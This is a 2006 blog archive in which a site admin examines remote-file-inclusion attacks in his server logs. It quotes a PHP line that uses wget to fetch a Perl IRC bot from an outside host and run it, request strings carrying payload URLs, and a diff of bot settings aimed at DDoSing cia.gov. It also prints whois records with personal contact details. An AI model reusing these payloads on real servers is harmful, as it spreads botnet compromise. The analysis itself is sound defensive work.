Tag Archives: IRC botnet

script kiddies go home.

2006.12.31 – 8:07 am PST

Yeesh, another day another set of lame attacks. This [tag]hack attempt[/tag] tries to use BBCodeFile. This one like the first one from last week, attempts to join an IRC botnet. Attempts to get files from the full-comandos.com website. Also contains the following text in the files it attempts to download. I’ve renamed the file extensions so accidents are less likely to happen with this code.
[tags]irc botnet, hack attempt, script kiddie, security, internet[/tags]

lol.gif.txt:@passthru('cd /tmp;wget http://jaheem.by.ru/tes.pl;perl tes.pljaheem;rm -tes.pl*');
...
r.gif.txt: $mhost = 'http://opersconexion.port5.com?';
r.gif.txt: $bt = 'http://www.full-comandos.com/jobing/r0nin';
r.gif.txt: $dc = 'http://www.full-comandos.com/jobing/dc.txt';
...
tes.pl.txt:$cmd="http://jaheem.by.ru/r.gif?";
...
#ANTICLONE 1337 :p
...
# MORGAN OWNED YOUR BOX
# www.FST-Production
# irc.gigachat.net - #Morgan

well this is enough boredom for me, for now.

attack log

px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:49 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:43:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:43:53 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:04 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:06 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:08 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:45:06 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:50 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:45:52 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:08 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:46:10 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:48 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:46:49 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:27 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.233.159.244 62.233.159.244 - - [31/Dec/2006:07:47:29 -0700] "GET ///tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 54088 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:30 -0700] "GET //tags//feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
px.ns1.net 62.75.138.80 static-ip-62-75-138-80.inaddr.intergenia.de - - [31/Dec/2006:07:47:31 -0700] "GET //tags/security/feed//tags.php?BBCodeFile=http://JaheeM.by.ru/r.gif? HTTP/1.1" 404 52792 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.
By px | Posted in internet | Also tagged , , | Comments (0)

CIA currently under attack.

2006.12.30 – 4:34 pm PST

Well as an update to that lame [tag]hack attempt[/tag] from last week. Here are the logs of a continuing attack, which is still going on at this time. I would look into it further but, I have a huge headache, and my ability to sit up right at the moment is painful. I reported the last incident to the appropriate parties including Tucows, without any such reply. Maybe I will attempt to report this one, but doubtfully anyone will listen again.
It appears to be the same botnet script from looking at the URL it wants to grab.
This is just plain annoying.

[update]
OK, so I couldn’t help myself from downloading the scripts. and low and behold, they are attempting to DDOS the cia.gov website. The files they attempt to retrieve do not exist of course. And are provided with a redirect link to.
https://www.cia.gov/redirects/ciaredirect.html

$ diff borek.txt ../2006.12.25/borek.txt 
13c13
< my $sPort      = '7778';
---
> my $sPort      = '6667';
23c23
< open(LOCK, '>/tmp/sess_ter8c25f563ff894083bf9db1011bde6') or die;
---
> open(LOCK, '>/tmp/sess_et12c22f5t4fg872r83bf9db1e11bde6') or die;
203,205c203,205
< my $bPath = '/tmp/sess_66f0ef45beea164fc15fd24d1e9d7311';
<     my $rfi   = 'http://cia.gov/czap.txt';
<     my $bLoc = 'http://cia.gov/barek.txt';
---
>     my $bPath = '/tmp/sess_65e12f31e32a36ufc15fd24d1e9d7311';
>     my $rfi   = 'http://webstorch.com/cap.txt';
>     my $bLoc = 'http://webstorch.com/borek.txt';

Click to continue reading “CIA currently under attack.”

By px | Posted in internet | Also tagged , , , , , , , , | Comments (0)

lame xss hack attempt.

2006.12.25 – 6:43 am PST

I just happened to catch this in my logs. It almost seems like they thought I was using Tucows blogware hosting. Hmm. But I use wordpress. Ohwell, it’s Christmas, I’m bored as fuck, so here is the nitty gritty that I can figure out.

==> /var/log/apache2/fwd.ns1.net_access_log < ==
fwd.ns1.net besthost5.com - - [25/Dec/2006:05:55:10 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]=http://www.husnaweb.com/c.in? HTTP/1.1" 301 427 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.
 
==> /var/log/apache2/px.ns1.net_access_log < ==
px.ns1.net besthost5.com - - [25/Dec/2006:05:55:11 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV%5bTCA_HOME%5d=http://www.husnaweb.com/c.in%3f HTTP/1.1" 404 52958 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.
 
==> /var/log/apache2/fwd.ns1.net_access_log < ==
fwd.ns1.net besthost5.com - - [25/Dec/2006:05:55:14 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]=http://www.husnaweb.com/c.in? HTTP/1.1" 301 427 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.
 
==> /var/log/apache2/px.ns1.net_access_log < ==
px.ns1.net besthost5.com - - [25/Dec/2006:05:55:14 -0700] "GET //tag/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV%5bTCA_HOME%5d=http://www.husnaweb.com/c.in%3f HTTP/1.1" 404 52958 "-" "libwww-perl/5.64" mod_deflate: In:- Out:-:-pct.

If the request had worked, it would have downloaded the file “c.in”, which then tries to embed itself into the server. The request came from an IP address in Bangkok Thailand. 203.146.140.221

The file this hack attempt wanted me to download would have been from a domain registered in Rio De Janeiro, Brazil. Although the IP address is registered to InterNAP in San Jose it appears. 64.74.223.4

At the end of the script it attempts to download this next file.
http://www.husnaweb.com/cmd2.txt
which then attempts to download;

http://www.husnaweb.com/borek.txt
I haven’t seen a script kiddie who can spell and use proper grammar and still the header of this file contains a harsh, but rather true statement. 

omg your box got owned. secure ur shit better. if you dont know how, why are you admin of this box?

The rest of the file is an IRC bot, for use in well an Zombie IRC Botnet for whatever ill purposes they choose.

Request: besthost5.com
whois server for *.com is whois.crsnic.net ...
connected to whois.crsnic.net [199.7.59.74:43] ... 
connected to whois.dotregistrar.com [209.67.69.25:43] ... 
This whois service shows the information for .COM and .NET domains 
only if they are registered thru DotRegistrar.com. For ORG, .BIZ, .US .INFO and
.NAME domains, the information is displayed regardless of the sponsoring
registrar for said domains.
 
The fact that your query returns "NOT FOUND" does not necessarily mean that
the domain may be available for registration. To search all domains, please
go to the shared registry whois located at:
http://www.internic.net/whois.html
 
 
Registrant:
   Nopparat Thong (BESTHOST5-COM-DOM)
   BEST HOST
   94/7 Bangchanglow
   Bangkok, Bangkok 10700
   THAILAND
   (662) 8665400
   (662) 4112082
   nopbk@hotmail.com
 
   Domain Name: BESTHOST5.COM
   Status: PROTECTED
 
   Administrative Contact:
      Nopparat Thong nopbk@hotmail.com
      94/7 Bangchanglow
      Bangkok, Bangkok 10700
      THAILAND
      (662) 8665400
      Fax- (662) 4112082
 
   Technical Contact, Zone Contact:
      Nopparat Thong nopbk@hotmail.com
      94/7 Bangchanglow
      Bangkok, Bangkok 10700
      THAILAND
      (662) 8665400
      Fax- (662) 4112082
 
   Record last updated on 03-Jul-2006.
   Record expires on 02-Jun-2007.
   Record created on 02-Jun-2005.
 
   Domain servers in listed order:
 
   Name Server: ns1.besthost5.com
   Name Server: ns2.besthost5.com
 
connected to whois.apnic.net [202.12.29.13:43] ... 
% [whois.apnic.net node-1]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html
 
inetnum:      203.146.140.192 - 203.146.140.255
netname:      csloxinfoidc-th
country:      TH
descr:        reassign to "CSLOXINFO IDC "
descr:        contact "vareepon@csloxinfo.net"
admin-c:      LIA1-AP
tech-c:       LIA1-AP
status:       ASSIGNED NON-PORTABLE
changed:      domaster@loxinfo.co.th 20050309
mnt-by:       LOXINFO-IS
source:       APNIC
 
role:         Loxinfo IP Admins
address:      304 Suapah Rd, Pomprab
address:      Pomprab Suttruphai,Bangkok
country:      TH
phone:        +662 6225678
fax-no:       +662 6228380
e-mail:       domaster@loxinfo.co.th
admin-c:      DL85-AP
tech-c:       DL85-AP
nic-hdl:      LIA1-AP
mnt-by:       LOXINFO-IS
changed:      ip_admin@csloxinfo.net 20060703
source:       APNIC
Request: 208.101.16.120
connected to whois.arin.net [192.149.252.44:43] ... 
connected to rwhois.softlayer.com [66.228.118.81:4321] ... 
%rwhois V-1.5:003fff:00 rwhois.softlayer.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:NETBLK-SOFTLAYER.208.101.0.0/18
network:Auth-Area:208.101.0.0/18
network:Network-Name:SOFTLAYER-208.101.0.0
network:IP-Network:208.101.16.120/29
network:IP-Network-Block:208.101.16.120-208.101.16.127
network:Organization;I:BaseRunner Net Services
network:Street-Address:9 Brian Drive
network:City:Rochester
network:State:NY
network:Postal-Code:14624-3603
network:Country-Code:US
network:Tech-Contact;I:sysadmins@softlayer.com
network:Abuse-Contact;I:abuse@softlayer.com
network:Admin-Contact;I:IPADM258-ARIN
network:Created:20060315
network:Updated:20060315
network:Updated-By:ipadmin@softlayer.com
 
Registrant:
   Husna Ahmad
   1691 South Ave
   Rochester, New York 14620
   United States
 
   Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
   Domain Name: HUSNAWEB.COM
      Created on: 11-Jun-03
      Expires on: 11-Jun-07
      Last Updated on: 
 
   Administrative Contact:
      Ahmad, Husna  ahmad_husna@yahoo.com
      1691 South Ave
      Rochester, New York 14620
      United States
      585 507-2244
 
   Technical Contact:
      Ahmad, Husna  ahmad_husna@yahoo.com
      1691 South Ave
      Rochester, New York 14620
      United States
      585 507-2244
 
   Domain servers in listed order:
      NS1.BASERUNNER.NET
      NS2.BASERUNNER.NET
 
Request: 64.74.223.4
connected to whois.arin.net [192.149.252.44:43] ... 
Internap Network Services PNAP-SEA-BLOCK4 (NET-64-74-0-0-1) 
                                  64.74.0.0 - 64.74.255.255
eNom INAP-SJE-ENOM-3077 (NET-64-74-223-0-1) 
                                  64.74.223.0 - 64.74.223.255
 
Request: NET-64-74-223-0-1
connected to whois.arin.net [192.149.252.44:43] ... 
 
CustName:   eNom
Address:    2002 156th Ave NE
City:       Bellevue
StateProv:  WA
PostalCode: 98008
Country:    US
RegDate:    2005-09-23
Updated:    2005-09-23
 
NetRange:   64.74.223.0 - 64.74.223.255 
CIDR:       64.74.223.0/24 
NetName:    INAP-SJE-ENOM-3077
NetHandle:  NET-64-74-223-0-1
Parent:     NET-64-74-0-0-1
NetType:    Reassigned
Comment:    
RegDate:    2005-09-23
Updated:    2005-09-23
 
RTechHandle: INO3-ARIN
RTechName:   InterNap Network Operations Center 
RTechPhone:  +1-877-843-4662
RTechEmail:  noc@internap.com 
 
OrgAbuseHandle: IAC3-ARIN
OrgAbuseName:   Internap Abuse Contact 
OrgAbusePhone:  +1-206-256-9500
OrgAbuseEmail:  abuse@internap.com
 
OrgTechHandle: INO3-ARIN
OrgTechName:   InterNap Network Operations Center 
OrgTechPhone:  +1-877-843-4662
OrgTechEmail:  noc@internap.com
 
# ARIN WHOIS database, last updated 2006-12-24 19:10
 
Request: full-comandos.com
whois server for *.com is whois.crsnic.net ...
connected to whois.crsnic.net [199.7.50.74:43] ... 
connected to whois.enom.com [72.5.232.19:43] ... 
=-=-=-=
Visit AboutUs.org for more information about full-comandos.com
<a href="http://www.aboutus.org/full-comandos.com">AboutUs: full-comandos.com
 
Registration Service Provided By: Surpass Hosting
Contact: enom@surpasshosting.com
Visit: http://www.surpasshosting.com
 
Domain name: full-comandos.com
 
Registrant Contact:
   Full-Comandos
   Full Comandos (svitlanad@bsdmail.com)
   +55.2126673894
   Fax: +55.2126673894
   Rua Retirodos Artistas
   Rio de Janeiro, RJ 38763-000
   BR
 
Administrative Contact:
   Full-Comandos
   Full Comandos (svitlanad@bsdmail.com)
   +55.2126673894
   Fax: +55.2126673894
   Rua Retirodos Artistas
   Rio de Janeiro, RJ 38763-000
   BR
 
Technical Contact:
   Full-Comandos
   Full Comandos (svitlanad@bsdmail.com)
   +55.2126673894
   Fax: +55.2126673894
   Rua Retirodos Artistas
   Rio de Janeiro, RJ 38763-000
   BR
 
Status: Locked
 
Name Servers:
   dns1.name-services.com
   dns2.name-services.com
   dns3.name-services.com
   dns4.name-services.com
   dns5.name-services.com
 
Creation date: 26 Nov 2005 14:14:08
Expiration date: 26 Nov 2006 14:14:08
</a>

The interesting thing about the previous domain, you will notice that the domain has been expired for almost an entire months time.

Domain Registrars should immediately terminate the domain registration, and DNS records when this stuff is reported, but they don’t. If they actually bothered to just remove the DNS records from expired domains, that would help also.

[tags]xss, hack attempt, hack, irc botnet, tucows, blogware, freedbacking, rant[/tags]

By px | Posted in internet | Also tagged , , , , , | Comments (0)

Bad Behavior has blocked 836 access attempts in the last 7 days.

>>>>>>> .r246